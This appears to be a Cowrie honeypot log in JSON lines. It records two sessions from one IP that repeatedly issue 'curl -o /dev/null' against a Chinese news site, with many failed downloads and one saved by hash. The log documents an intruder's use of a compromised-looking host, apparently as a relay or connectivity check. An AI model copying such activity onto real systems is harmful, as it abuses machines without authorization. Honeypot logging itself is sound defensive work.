{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.674950Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.728049Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.729085Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.739487Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.740664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.761373Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.762783Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.777971Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.779039Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.785062Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.786010Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.801630Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.803079Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.818903Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.820096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.822602Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.823354Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.845766Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.847376Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.868421Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.869488Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.892429Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.893426Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.930122Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.931127Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.943277Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.944164Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.975271Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.976412Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:54.982373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:54.983446Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.018439Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.019888Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.024014Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.025083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.063008Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.065472Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.067251Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.071184Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.072821Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.075755Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.111002Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.119538Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.120451Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.123253Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.124347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.149525Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.153027Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.168504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.169776Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.173346Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.174209Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.183275Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.200663Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.212113Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.213025Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.217532Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.218744Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.220476Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.252724Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.254179Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.256106Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.258032Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.260209Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.261244Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.288328Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.291001Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.296924Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.298054Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.328496Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.330728Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.340459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.341684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.367512Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.370115Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.379329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.380396Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.401044Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.402230Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.406859Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.408738Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.420215Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.421210Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.440293Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.441430Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.456677Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.457728Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.480043Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.481070Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.484494Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.486231Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.494883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.496037Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.520463Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.521741Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.527631Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.528743Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.538513Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.539710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.556647Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.558856Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.575851Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.576937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.583884Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.584824Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.595614Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.596674Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.601301Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.620842Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.621984Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.626259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.626991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.634428Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.667736Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.668824Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.671280Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.672428Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.674326Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.707656Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.708805Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.710884Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.713839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.715054Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.750287Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.752336Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:55.754542Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:55.755563Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
